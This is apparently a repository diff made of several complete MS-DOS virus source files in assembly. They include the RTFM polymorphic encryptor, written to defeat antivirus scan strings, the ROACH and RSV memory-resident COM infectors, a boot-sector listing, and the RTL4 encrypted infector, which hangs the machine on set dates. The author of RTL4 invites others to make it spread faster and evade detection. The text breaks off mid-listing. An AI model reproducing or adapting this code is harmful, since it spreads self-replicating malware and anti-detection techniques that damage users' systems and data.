db 81h,0efh,62h,0 ;sub di,EndMessage-Message
mov cx,EndMessage-Message
rep movsb
ExitInt1c:
pop es ds di si cx ax
popf
iret
;Message says " Righard Zwienenberg made the DUTCH-555 virus!!! "
;Capital O's are attribute values....
Message:
db ' OROiOgOhOaOrOdO OZOwOiOeOnOeOnO'
db 'bOeOrOgO OmOaOdOeO OtOhOeO ODOUO'
db 'TOCOHO-O5O5O5O OVOiOrOuOsO!O!O!O'
db ' O'
EndMessage:
Counter db 0
TimerCount dw 0
JumpBytes db 0E9h
JumpSize dw 0
FileAttribs dw 0
Filehandle dw 0
FileDate dw 0
FileTime dw 0
end start
MSDOS/R-Index/Virus.MSDOS.Unknown.rme11.asm
+324
View File
@@ -0,0 +1,324 @@
;------------------------------------------------------------------------------
;
; Rajaats Tiny Flexible Mutator (RTFM) V1.1 (C) 1994 by Rajaat
;
; Purpose : making it impossible to use scan strings
;
; Input :
; DS:SI = piece of code to encrypt
; ES:SI = place of decryptor+encrypted code
; CX = length of code (include the mutator (mut_len))
; BX = offset of decryptor in file
; AX = flag bits
; 0 = 1 do not use junk code
; Output :
; DS:DX = place of decryptor+encrypted code
; CX = length of encrypted code+decryptor
; BP = preserved
; Other registers might be trashed
;
; History :
; 1.0 initial version
; 1.1 the decrease counter can get an add or sub
; the increase pointer can get an add or sub
; added random byte operation with one register as trash function
;
;------------------------------------------------------------------------------
SMART
JUMPS
_text segment 'text'
assume cs:_text
.radix 16
public mut_top
public mut_bottom
public mut_len
public rnd_init
public rnd_get
public mutate
dos_get_time equ 2c
dos_get_date equ 2a
mut_bottom = $
reg enum _ax,_cx,_dx,_bx,_sp,_bp,_si,_di
seed dw 0
count dw 0
ofs dw 0
dest dw 0
indexbyte db 00000000b
countbyte db 00000000b
process db 00000000b ; bit 0 : 1 = count register set up
; 1 : 1 = index register set up
; 2 : 1 = don't use junk code
decraddr dw 0
loopaddr dw 0
opertab db 30,0,28
trash equ $
cmc
clc
stc
nop
mutate: push bp
push ds
push es
push si
call mut_delta
mut_delta: pop bp
sub bp,offset mut_delta
mov byte ptr cs:[process][bp],0
mov byte ptr cs:[indexbyte][bp],0
mov byte ptr cs:[countbyte][bp],0
mov word ptr cs:[count][bp],cx
mov word ptr cs:[ofs][bp],bx
mov word ptr cs:[dest][bp],di
test al,1
jnz usejunk
or byte ptr cs:[process][bp],4
usejunk: call rnd_init
setaction: mov al,byte ptr cs:[process][bp]
and al,3
cmp al,3
jz setregsok
jmp setregs
setregsok: call insert_trash
mov word ptr cs:[loopaddr][bp],di
mov ax,802e
stosw
getoper: call rnd_get
and ax,3
or al,al
jz getoper
mov bx,ax
add bx,bp
push ds
push cs
pop ds
lea si,opertab[bx-1]
lodsb
pop ds
mov byte ptr cs:[action][bp],al
cmp al,30
jz noaddsubflip
xor byte ptr cs:[action][bp],28
noaddsubflip: add al,byte ptr cs:[indexbyte][bp]
test al,4
jnz toomuch
xor al,6
toomuch: xor al,2
stosb
call rnd_get
stosb
push ax
call insert_trash
call rnd_get
test al,1
jnz ptrinc
test al,2
jnz ptrsub
mov ax,0c083
add ah,byte ptr cs:[indexbyte][bp]
stosw
mov al,01
stosb
jmp makecount
ptrsub: mov ax,0e883
add ah,byte ptr cs:[indexbyte][bp]
stosw
mov al,0ffh
stosb
jmp makecount
ptrinc: mov al,40
add al,byte ptr cs:[indexbyte][bp]
stosb
makecount: call insert_trash
call rnd_get
test al,1
jnz countdec
test al,2
jnz countsub
mov ax,0c083
add ah,byte ptr cs:[countbyte][bp]
stosw
mov al,0ff
stosb
jmp makeloop
countsub: mov ax,0e883
add ah,byte ptr cs:[countbyte][bp]
stosw
mov al,01
stosb
jmp makeloop
countdec: mov al,48
add al,byte ptr cs:[countbyte][bp]
stosb
makeloop: mov al,75
stosb
mov ax,word ptr cs:[loopaddr][bp]
sub ax,di
dec ax
stosb
call insert_trash
mov ax,di
sub ax,word ptr cs:[dest][bp]
add ax,word ptr cs:[ofs][bp]
push di
mov di,word ptr cs:[decraddr][bp]
stosw
pop di
pop ax
xchg al,ah
pop si
mov cx,word ptr cs:[count][bp]
encrypt: lodsb
action equ $
db 0,0e0
stosb
loop encrypt
mov cx,di
mov dx,word ptr cs:[dest][bp]
sub cx,dx
pop es
pop ds
pop bp
ret
setregs: call insert_trash
call rnd_get
test al,1
jnz firstcount
testflag byte ptr cs:[process][bp],2
jnz return
setflag byte ptr cs:[process][bp],2
call set_index
jmp setaction
firstcount: testflag byte ptr cs:[process][bp],1
jnz return
setflag byte ptr cs:[process][bp],1
call set_count
return: jmp setaction
set_index: call rnd_get
and al,1
or al,6
test ah,1
jz nobx
mov al,_bx
nobx: cmp al,byte ptr cs:[countbyte][bp]
jz set_index
mov byte ptr cs:[indexbyte][bp],al
add al,0b8
stosb
mov word ptr cs:[decraddr][bp],di
stosw
ret
set_count: call rnd_get
and al,7
cmp al,byte ptr cs:[indexbyte][bp]
jz set_count
cmp al,_sp
jz set_count
mov byte ptr cs:[countbyte][bp],al
add al,0b8
stosb
mov ax,word ptr cs:[count][bp]
stosw
ret
insert_trash: test byte ptr cs:[process][bp],4
jnz trasher
ret
trasher: call rnd_get
test ah,1
jnz specialtrash
and ax,3
or ax,ax
jz trash_done
mov cx,ax
more_trash: call rnd_get
and ax,3
lea bx,trash[bp]
add bx,ax
mov al,byte ptr cs:[bx]
stosb
loop more_trash
trash_done: ret
specialtrash: call rnd_get
and al,7
cmp al,_sp
jz specialtrash
cmp al,byte ptr cs:[indexbyte][bp]
je specialtrash
cmp al,byte ptr cs:[countbyte][bp]
je specialtrash
test ah,1
jz domov
test ah,2
jz doinc
test ah,4
jz dodec
mov al,083
stosb
regtrash: call rnd_get
mov ah,al
and al,7
cmp al,_sp
jz regtrash
cmp al,byte ptr cs:[indexbyte][bp]
jz regtrash
cmp al,byte ptr cs:[countbyte][bp]
jz regtrash
mov al,ah
or al,0c0
stosb
call rnd_get
stosb
ret
dodec: add al,8
doinc: add al,40
stosb
ret
domov: add al,0b8
storeit: stosb
call rnd_get
stosw
ret
rnd_init: mov ah,dos_get_time
int 21
xor cx,dx
mov word ptr cs:[seed][bp],cx
mov ah,dos_get_date
int 21
mov cl,al
rcr dx,cl
not dx
sbb word ptr cs:[seed][bp],dx
ret
rnd_get: push bx
mov bx,word ptr cs:[seed][bp]
in al,40
xchg ah,al
in al,40
xor ax,bx
sbb ax,bx
ror ax,1
mov word ptr cs:[seed][bp],ax
pop bx
ret
db '[RTFM]'
mut_top = $
mut_len = mut_top-mut_bottom+0fh
_text ends
end
MSDOS/R-Index/Virus.MSDOS.Unknown.rnd.asm
+68
View File
@@ -0,0 +1,68 @@
; A pseudo random numbers generator
; for use with the MuTation Engine <tm>
; Version 1.01 (26-10-91)
; (C) 1991 CrazySoft, Inc.
.model tiny
.code
public rnd_init, rnd_get, rnd_buf, data_top
rnd_init:
push ds si dx cx bx
xor ah,ah
int 1ah
in al,[40h]
mov ah,al
in al,[40h]
xor ax,cx
xor dx,ax
push cs
pop ds
mov si,offset rnd_buf
xor bh,bh
jmp short rnd_put
rnd_get:
push ds si dx cx bx
push cs
pop ds
mov si,offset rnd_buf
mov bl,[si]
xor bh,bh
mov ax,[bx+si+2]
mov dx,[bx+si+4]
add byte ptr [si],4
mov cx,7
rnd_lup:
shl ax,1
rcl dx,1
mov bl,al
xor bl,dh
jns nxt_bit
inc al
nxt_bit:
loop rnd_lup
rnd_put:
mov bl,[si+1]
mov [bx+si+2],ax
mov [bx+si+4],dx
add bl,4
mov [si+1],bl
mov al,dl
cmp bl,[si]
jnz rnd_done
add byte ptr [si],4
rnd_done:
pop bx cx dx si ds
ret
.data
rnd_buf dw 129 dup(?)
data_top:
end

MSDOS/R-Index/Virus.MSDOS.Unknown.roach.asm
+311
View File
@@ -0,0 +1,311 @@
;Developed and Programmed in Australia.
;Copy_ya_right 1997
;Virus Name : ROACH
;The ROACH virus will install itself memory resident, below the video memory.
;once this virus is in memory it will only infect COM files. It will not
;infect command.com.
;--------------------------- S T A R T -------------------------------------
host_start: ;start of the host file
jmp virus_start ;start the virus code
mov ah,4ch ;exit the virus code
int 21h ;dos call
;----- This is the start of the virus code ----------------------------------
virus_start: ;start of the virus code
mov ax,sp ;load ax with stack pointer
mov si,ax ;move stack pointer to si
mov ax,ss ;move stack segment to ax
mov ds,ax ;load ds with stack segment
mov di,100h ;point to the host start
mov cx,2 ;we need to do this twice
push_100_to_stack:
dec si,2 ;dec the stack pointer
mov sp,si ;move the stack pointer
mov word ptr ds:[si],di ;save di to the stack
loop push_100_to_stack ;do it twice
inc di ;inc byte one
mov al,byte ptr es:[di]
mov ah,byte ptr es:[di+1]
add ax,103h
mov bp,ax ;save to the
add si,2 ;inc the stack pointer
mov sp,si ;mov the stack pointer
mov di,word ptr ds:[si] ;get the address from stack
mov si,bp ;load si with fix address
add si,virus_len ;and host to the source index
sub si,3
push es
pop ds ;get the data segment
mov cx,3 ;move 3 bytes
rep movsb ;and move the data back
mov ax,5432h ;are we resident
int 21h ;dos call
cmp ax,0063h ;are we resident
jne memory_resident ;lets go resident
exit_virus:
xor ax,ax ;fix up
mov bx,ax ;fix up
mov cx,ax ;fix up
mov dx,ax ;fix up
mov di,ax ;fix up
mov si,ax ;fix up
mov es,ax ;fix up
ret ;and return to the host
;----- This makes the virus go memory resident ------------------------------
memory_resident:
mov ah,52h ;get the list of lists
int 21h ;dos call
mov ax,es:[bx-2] ;load ax first mcb chain
mov es,ax ;set es to first mcb block
mcb1:
cmp byte ptr es:[0],'Z' ;is it the last mcb chain
jne mcb2 ;not then next mcb chain
clc ;clear carry flag
jmp mcbx ;found last mcb chain, bail
mcb2:
mov ax,es ;mov extra segment to ax
add ax,word ptr es:[3] ;add from the list
inc ax ;fix up
mov es,ax ;es is the new segment
jmp short mcb1 ;and do it again
mcbx:
mov byte ptr es:[0],'Z' ;make it the last mcb chain
sub word ptr es:[3],virus_len/15 ;take the virus from the mcb
add ax,word ptr es:[3] ;
inc ax ;fix up the address
mov es,ax ;es is the new segment
push es ;save to the stack
push cs ;push the code segment
pop ds ;get ds from the stack
mov ax,3521h ;get interrupt 21h
int 21h ;dos call
mov si,bp ;load the si with virus start
add si,virus_len ;add the virus len to it
sub si,7
mov word ptr ds:[si],bx ;save the old int 21h vector
mov word ptr ds:[si+2],es ;save the old int 21h vector
pop ds ;get from the stack
mov ax,2521h ;get the interrupt vector
mov dx,new_21
int 21h ;dos call
push ds
pop es
push cs
pop ds
xor di,di
mov si,bp ;offset of the start of virus
mov cx,virus_len ;number of bytes to move
do_load_tsr:
mov ax,word ptr ds:[si] ;load the byte from host
mov word ptr es:[di],ax ;store the byte in memory
add si,2 ;inc the host pointer
add di,2 ;inc the memory pointer
loop do_load_tsr
push cs ;push the code segment
pop ds ;reset ds to the original
jmp exit_virus ;exit the virus code
db '[Roach] by SliceMaster 1997' ;copyright string roach
;----- This is the code that runs in memory ---------------------------------
exit_virus_tsr:
jmp dword ptr cs:[data_start] ;exit back to the function
fake_dos_function:
pushf ;save the flags
call dword ptr cs:[data_start] ;fake a dos call
ret ;and return
new_21h:
cmp ax,5432h ;is it the virus checking
jne check_interrupts ;check out the interrupts
mov ax,0063h ;yep we are in memory
iret ;interrupt return
check_interrupts:
inc ah ;add one the the function
cmp ah,4ch ;load and exec a program
je go_virus_infect ;this is our interrupt
cmp ah,3eh ;open file call
je go_virus_infect ;this is our interrupt
cmp ah,44h ;change attrubute call
je go_virus_infect ;this is our interrupt
dec ah ;sub one from the function
jmp exit_virus_tsr ;exit the virus in memory
go_virus_infect:
dec ah ;fix up before we exit
push ax ;\
push bx ; \
push cx ; \
push dx ; \
push si ; / save to the stack
push di ; / so the interrupt
push ds ; / will work on
push es ; / exit.
push bp ;/
call check_ext ;is it a com file
call open_host ;open the host file for r/w
call read_host_3 ;read the host first 3
call infect_host ;infect file
exit_host_infected:
call close_host ;close the host file
exit_virus_memory: ;ti we are here.
pop ax ;/
jmp exit_virus_tsr ;exit the virus tsr
;----- This checks the file ext --------------------------------------------
check_ext:
push dx
pop si ;get the source index
mov cx,0ffh ;search for a com file ext
find_ext:
mov al,byte ptr ds:[si] ;load the byte at ds:dx
cmp al,'.' ;is it a .
je found_ext ;found the ext
inc si ;inc the location
loop find_ext ;do it again
found_ext:
inc si ;inc the position
mov ax,word ptr ds:[si] ;load the byte ad ds:si
cmp ax,'OC' ;is it a com file
je found_com_file ;do a nother check
pop ax ;get off the stack
jmp exit_virus_memory ;not com file bail
found_com_file:
ret ;and return
;----- This opens a host file -----------------------------------------------
open_host:
mov ax,3d02h ;open file read write access
call fake_dos_function ;fake a dos interrupt
mov bx,ax ;move the handle into bx
ret ;and return
;----- This closes a host file ----------------------------------------------
close_host:
mov ah,3eh ;close a file
call fake_dos_function ;close the file
ret ;and return
;----- This reads the first 3 bytes from the host ---------------------------
read_host_3:
push ds ;save to the stack
push dx ;save to the stack
push cs ;push the code segment
pop ds ;get the tsr segment
xor dx,dx ;zero out dx
add dx,virus_len ;add the virus len to it
sub dx,3 ;fix up dx to point to buffer
push dx ;save to the stack
mov ah,3fh ;read from the host
mov cx,3 ;read 3 bytes of host
call fake_dos_function ;fake a dos call
pop si ;get si from the stack
mov ah,byte ptr ds:[si] ;load ah with the first byte
cmp ah,0e9h ;is it a jump instruction
je is_infect ;is the file infected
cmp ah,'M' ;does it have a MZ header
je is_infect ;the file is a command.com
pop dx ;get call from the stack
pop ds ;get call from the stack
ret ;and return
is_infect:
pop dx ;get from the stack
pop ds ;get call from the stack
pop ax ;get call from the stack
jmp exit_host_infected ;exit the host is infected
;----- This infects the host file -------------------------------------------
infect_host:
push ds ;save to the stack
push dx ;save to the stack
call lseek_end ;seek to the end of the host
push ax ;save the location
push cs ;push the code segment
pop ds ;get the virus segment
mov ah,40h ;time to write virus to end
mov cx,virus_len ;number of bytes to write
xor dx,dx ;at the start of the segment
call fake_dos_function ;fake a dos function
call lseek_start ;seek to the start
xor dx,dx ;zero out dx
add dx,virus_len ;add the virus len to it
sub dx,3 ;fix up dx to point to buffer
mov si,dx ;mov si the pointer
mov ah,0e9h ;mov jump instruction in ah
mov byte ptr ds:[si],ah ;write the jump in
pop ax ;get off the stack
dec al,3
mov word ptr ds:[si+1],ax ;write the address to buffer
mov dx,si ;write to dx the pointer
mov cx,3 ;number of bytes to write
mov ah,40h ;write to the host file
call fake_dos_function ;fake a dos function call
pop dx ;get off the stack
pop ds ;get off the stack
ret ;and return
;----- This seeks to the start or end of the host ---------------------------
lseek_end:
mov ax,4202h ;seek to the end
jmp lseek ;and do the seeking
lseek_start:
mov ax,4200h ;seek to the start
lseek:
xor dx,dx ;to start/end of host
xor cx,cx ;to start/end of host
call fake_dos_function ;fake a dos call
ret ;and return
;----- From here down is were all the data for virus is stored!! ------------
data1:
old_21h dd 0 ;old interrupt 21h function
host_3 db 3 dup(90h) ;original first 3 bytes
virus_end:
virus_len equ virus_end - virus_start ;len of the virus code
data_start equ data1 - virus_start ;starting address of data
new_21 equ new_21h - virus_start ;len from the start to int
MSDOS/R-Index/Virus.MSDOS.Unknown.root.asm
+249
View File
@@ -0,0 +1,249 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ ROOT ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 30-Aug-92 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: none ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_0001e equ 78h
data_0002e equ 7C0Bh ;*
data_0003e equ 7C0Dh ;*
data_0004e equ 7C0Eh ;*
data_0005e equ 7C10h ;*
data_0006e equ 7C11h ;*
data_0007e equ 7C13h ;*
data_0008e equ 7C15h ;*
data_0009e equ 7C16h ;*
data_0010e equ 7C18h ;*
data_0011e equ 7C1Ah ;*
data_0012e equ 7C1Ch ;*
data_0013e equ 7C1Eh ;*
data_0014e equ 7C20h ;*
data_0015e equ 7C24h ;*
data_0016e equ 7C25h ;*
data_0017e equ 7C3Eh ;*
data_0018e equ 7C49h ;*
data_0019e equ 7C4Bh ;*
data_0020e equ 7C4Dh ;*
data_0021e equ 7C4Fh ;*
data_0022e equ 7C50h ;*
data_0023e equ 7C52h ;*
data_0024e equ 7D9Eh ;*
data_0025e equ 7DE6h ;*
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
root proc far
start:
jmp short loc_0002
db 90h
db 'MSDOS5.0'
db 00h, 02h, 04h, 01h, 00h, 02h
db 00h, 02h,0FEh,0EFh,0F8h, 3Ch
db 00h, 11h, 00h, 0Fh, 00h, 11h
db 7 dup (0)
db 80h, 00h, 29h, 27h, 45h, 08h
db 19h
db 'MS-DOS_5 FAT16 '
loc_0002:
cli ; Disable interrupts
xor ax,ax ; Zero register
mov ss,ax
mov sp,7C00h
push ss
pop es
mov bx,data_0001e
lds si,dword ptr ss:[bx] ; Load 32 bit ptr
push ds
push si
push ss
push bx
mov di,data_0017e
mov cx,0Bh
cld ; Clear direction
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
push es
pop ds
mov byte ptr [di-2],0Fh
mov cx,ds:data_0010e
mov [di-7],cl
mov [bx+2],ax
mov word ptr [bx],7C3Eh
sti ; Enable interrupts
int 13h ; Disk dl=drive a ah=func 00h
; reset disk, al=return status
jc loc_0004 ; Jump if carry Set
xor ax,ax ; Zero register
cmp ds:data_0007e,ax
je loc_0003 ; Jump if equal
mov cx,ds:data_0007e
mov ds:data_0014e,cx
loc_0003:
mov al,ds:data_0005e
mul word ptr ds:data_0009e ; ax = data * ax
add ax,ds:data_0012e
adc dx,ds:data_0013e
add ax,ds:data_0004e
adc dx,0
mov ds:data_0022e,ax
mov ds:data_0023e,dx
mov ds:data_0018e,ax
mov ds:data_0019e,dx
mov ax,20h
mul word ptr ds:data_0006e ; ax = data * ax
mov bx,ds:data_0002e
add ax,bx
dec ax
div bx ; ax,dx rem=dx:ax/reg
add ds:data_0018e,ax
adc word ptr ds:data_0019e,0
mov bx,500h
mov dx,ds:data_0023e
mov ax,ds:data_0022e
call sub_0002
jc loc_0004 ; Jump if carry Set
mov al,1
call sub_0003
jc loc_0004 ; Jump if carry Set
mov di,bx
mov cx,0Bh
mov si,data_0025e
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
jnz loc_0004 ; Jump if not zero
lea di,[bx+20h] ; Load effective addr
mov cx,0Bh
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
jz loc_0006 ; Jump if zero
loc_0004:
mov si,data_0024e
call sub_0001
xor ax,ax ; Zero register
int 16h ; Keyboard i/o ah=function 00h
; get keybd char in al, ah=scan
pop si
pop ds
pop word ptr [si]
pop word ptr [si+2]
int 19h ; Bootstrap loader
loc_0005:
pop ax
pop ax
pop ax
jmp short loc_0004
loc_0006:
mov ax,[bx+1Ah]
dec ax
dec ax
mov bl,ds:data_0003e
xor bh,bh ; Zero register
mul bx ; dx:ax = reg * ax
add ax,ds:data_0018e
adc dx,ds:data_0019e
mov bx,700h
mov cx,3
locloop_0007:
push ax
push dx
push cx
call sub_0002
jc loc_0005 ; Jump if carry Set
mov al,1
call sub_0003
pop cx
pop dx
pop ax
jc loc_0004 ; Jump if carry Set
add ax,1
adc dx,0
add bx,ds:data_0002e
loop locloop_0007 ; Loop if cx > 0
mov ch,ds:data_0008e
mov dl,ds:data_0015e
mov bx,ds:data_0018e
mov ax,ds:data_0019e
;* jmp far ptr loc_0001 ;*
db 0EAh, 00h, 00h, 70h, 00h
root endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_0001 proc near
loc_0008:
lodsb ; String [si] to al
or al,al ; Zero ?
jz loc_ret_0010 ; Jump if zero
mov ah,0Eh
mov bx,7
int 10h ; Video display ah=functn 0Eh
; write char al, teletype mode
jmp short loc_0008
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_0002:
cmp dx,ds:data_0010e
jae loc_0009 ; Jump if above or =
div word ptr ds:data_0010e ; ax,dxrem=dx:ax/data
inc dl
mov ds:data_0021e,dl
xor dx,dx ; Zero register
div word ptr ds:data_0011e ; ax,dxrem=dx:ax/data
mov ds:data_0016e,dl
mov ds:data_0020e,ax
clc ; Clear carry flag
retn
loc_0009:
stc ; Set carry flag
loc_ret_0010:
retn
sub_0001 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_0003 proc near
mov ah,2
mov dx,ds:data_0020e
mov cl,6
shl dh,cl ; Shift w/zeros fill
or dh,ds:data_0021e
mov cx,dx
xchg ch,cl
mov dl,ds:data_0015e
mov dh,ds:data_0016e
int 13h ; Disk dl=drive ? ah=func 02h
; read sectors to memory es:bx
; al=#,ch=cyl,cl=sectr,dh=head
retn
sub_0003 endp
db 0Dh, 0Ah, 'Non-System disk or dis'
db 'k error', 0Dh, 0Ah, 'Replace and'
db ' press any key when ready', 0Dh, 0Ah
db 0
db 'IO SYSMSDOS SYS'
db 00h, 00h, 55h,0AAh
seg_a ends
end start
MSDOS/R-Index/Virus.MSDOS.Unknown.rsv.asm
+160
View File
@@ -0,0 +1,160 @@
;
; RSV - written by Conzouler 1995
;
; memory resident
; com-append on execute
; no tb-flags
; no impressive features...
;
.model tiny
.code
.286
org 100h
psize equ (offset last - offset entry) / 10h + 1
size equ offset last - offset entry
entry:
db 0e9h,0,0
start:
call gores
oentry db 0CDh,20h,90h
gores:
mov ax, 4277h
int 21h
jnc restore
mov ah, 4Ah
mov bx, 0FFFFh
int 21h
mov ah, 4Ah
sub bx, psize+1
int 21h
mov ah, 48h
mov bx, psize
int 21h
sub ax, 10h
mov es, ax
mov word ptr es:[0F1h], 8
mov di, 103h
mov bp, sp
mov si, ss:[bp]
sub si, 3
mov cx, size-3
rep movsb
push es
pop ds
mov ax, 3521h
int 21h
mov i21o, bx
mov i21s, es
mov ah, 25h
mov dx, offset vec21
int 21h
restore:
push cs
pop ds
push ds
pop es
pop si
mov di, 100h
push di
movsw
movsb
retn
i21: db 0eAh
i21o dw ?
i21s dw ?
vec21:
cmp ax, 4277h
jne v21e
clc
retf 2
v21e: cmp ax, 4B00h
je infect
v21x:
jmp i21
infect:
push ax
push bx
push cx
push dx
push si
push ds
mov ax, 3D82h
int 21h
xchg ax, bx
push cs
pop ds
mov ah, 3Fh
mov dx, offset oentry
mov cx, 3
int 21h
cmp byte ptr oentry, 'M'
je infectx
mov ax, 4202h
xor cx, cx
cwd
int 21h
dec ax
mov si, ax
xchg dx, ax
mov ax, 4200h
int 21h
mov dx, offset last
mov ah, 3Fh
mov cx, 1
int 21h
cmp byte ptr last, 087h
je infectx
xchg ax, si
sub ax, 2
mov byte ptr entry, 0E9h
mov word ptr entry[1], ax
mov ah, 3Fh
inc ah
push ax
mov dx, 103h
mov cx, size-3
int 21h
mov ax, 4200h
xor cx, cx
cwd
int 21h
pop ax
mov dx, 100h
mov cx, 3
int 21h
infectx:
mov ah, 3Eh
int 21h
pop ds
pop si
pop dx
pop cx
pop bx
pop ax
jmp v21x
last:
end entry
MSDOS/R-Index/Virus.MSDOS.Unknown.rtl4.asm
+265
View File
@@ -0,0 +1,265 @@
;******************************************************************************
;
; RTL4 / WEDDEN DAT... VIRUS
;
;******************************************************************************
;
; "If a weaking linkage found, eliminate...
; Hear the cities fearfull roar!"
;
; Now in front of you lies another source of a virus. It is not a very good
; one, but, as you might say, a virus is a virus. After my wake at the PC, I
; created several viruses, like:
;
; Deicide / Glenn
; Morgoth
; Breeze
; Brother
; Commentator I
; Commentator II
; Spawnie
; Xmas
; 1St_Star / 222
; T-1000
;
; Well, I bet you think this is a whole lot, but some are minor variants, for
; which I don't have the guts to publish the source code. I have to admid,
; Deicide and Morgoth have spread very well. I uploaded them to a BBS and it
; was downloaded several times, and it is not detected by antivirus program yet.
; Deicide is now detectable, but that was my first attempt to make a virus.
;
; This virus is a Non-Resident Direct Action .COM Infector.
; It only infects files in the current directory.
; You can recognize a infected file simply, the 4th byte is a '*' (just like
; the 1St_Star virus). It is inactive from January till May and starts
; replicating from May. After July, every Wednessday after the 21st the
; program will hang the system, showing the address of RTL4 Joop v/d Ende
; Productions.
;
; Disclaimer : This program is like all other virus sources only for
; educational purposes and should not be given to irresponsible hands
; (John McAfee and people like him).
;
; For the criminal reader : Don't just change the text of this virus and
; say you made a virus. Instead use some ideas from this virus and create your
; own virus if you want to be nasty. Additions to this virus that makes it
; spreading faster and makes it harder to detect are welcome, as long as I get
; the new source code.
;
; I want to thank several virus writers for their support with letting McAfee
; and Ass. earn his money with making so many updates of SCAN...
; Here they are : Bit Addict, XSTC, Dark Helmet, Dark Avenger, Nuke!, Cracker
; Jack and many more creators.
;
; Note to XSTC : Thank you for disassembling the Deicide virus, for I have lost
; the source code. Next time write a message, because I might have the source
; code of the virus ready, but not uploaded. It saves you time, so you may
; disassemble another virus (ofcourse only for educational purposes ;-) )
;
; Now have fun with this virus, written in A86 assembler version 3.22
;
; Glenn Benton
;
; "Is it truly a disembodied head lurking in the dark of the tombs of fate?"
;
Org 0h ; The outcome will be .BIN
Start: Jmp MainVir ; Jump to main virus
Db '*' ; signature
MainVir: Call On1 ; Get virus offset
On1: Pop BP ; BP is the index register
Sub BP,Offset MainVir+3 ; Calculate virus offset
Push Ax ; And store AX (error reg.)
Lea Si,Crypt[BP] ; Decryptor for the
Mov Di,Si ; virus code. It's long
Mov Cx,CryptLen ; for a decoder, but it
Decrypt: Lodsb ; reduces the recognizable
Xor Al,0 ; part enough.
Stosb ;
Loop Decrypt ;
DecrLen Equ $-MainVir ; Decryptor length
Crypt: Mov Ax,Cs:OrgPrg[BP] ; Store the 4 first bytes
Mov Bx,Cs:OrgPrg[BP]+2 ; of the host
Mov Cs:Start+100h,Ax ;
Mov Cs:Start[2]+100h,Bx ;
Mov Ah,2ah ; Get date
Int 21h ; If it is a wednessday
Cmp Dh,8 ; after July and after
Jb NoMsg ; the 21st, it will
Cmp Dl,22 ; will continue, else
Jb NoMsg ; it goes to NoMsg
Cmp Al,3 ;
Jne NoMsg ;
Mov Ah,9 ; Display the message
Lea Dx,Msg[BP] ;
Int 21h ;
Lockout: Cli ; And lock the computer
Jmp Lockout ;
NoMsg: Cmp Dh,5 ; Is it after April?
Jae DoVirus ; Yes - Replicate
Jmp Ready ; No - Terminate to host
DoVirus: Mov Ah,1ah ; Move DTA to a safe place
Mov Dx,0fc00h ; $FE00
Int 21h
Mov Ah,4eh ;
Search: Lea Dx,FileSpec[BP] ; Search for a .COM file in
Xor Cx,Cx ; the current directory
Int 21h ;
Jnc Found ; If not exist, goto Ready
Jmp Ready ; else goto Found
Found: Mov Ax,4300h ; Get file attributes
Mov Dx,0fc1eh ; and store them on the stack
Int 21h ;
Push Cx ;
Mov Ax,4301h ; Wipe the attributes, so it
Xor Cx,Cx ; is accessable for us
Int 21h ;
Mov Ax,3d02h ; Open the file with
Int 21h ; read/write priority
Mov Bx,5700h ; Get de file date/time stamp
Xchg Ax,Bx ; and store them on the stack
Int 21h ;
Push Cx ;
Push Dx ;
Mov Ah,3fh ; Read the first 4 bytes
Lea Dx,OrgPrg[BP] ; of the program
Mov Cx,4 ;
Int 21h ;
Mov Ax,Cs:[OrgPrg][BP] ; Is it a weird EXE?
Cmp Ax,'MZ' ; Yes goto ExeFile
Je ExeFile ;
Cmp Ax,'ZM' ; Is it a normal EXE?
Je ExeFile ; Yes, goto ExeFile
Mov Ah,Cs:[OrgPrg+3][BP] ; Is it already infected?
Cmp Ah,'*' ; No, goto Infect
Jne Infect ;
ExeFile: Call Close ; Call File close
Mov Ah,4fh ; Jump to the search routine
Jmp Search ; again for a .COM file
FSeek: Xor Cx,Cx ; Subroutine for jumping to
Xor Dx,Dx ; the begin/end of file
Int 21h ;
Ret ;
Infect: Mov Ax,4202h ; Jump to EOF
Call FSeek ;
Sub Ax,3 ; Calculate new virus offset
Mov Cs:CallPtr[BP]+1,Ax ;
Mov Ah,2ch ; Get system time
Int 21h ;
Mov Cs:Decrypt+2[BP],Dl ; Move the decryptor part
Lea Si,MainVir[BP] ; with the 100ds second put
Mov Di,0fd00h ; into the XOR command to
Mov Cx,DecrLen ; the end of the 64K segment
Rep Movsb ;
Lea Si,Crypt[BP] ; Encrypt the virus with
Mov Cx,CryptLen ; the 100ds seconds.
Encrypt: Lodsb ; Merge it behind the
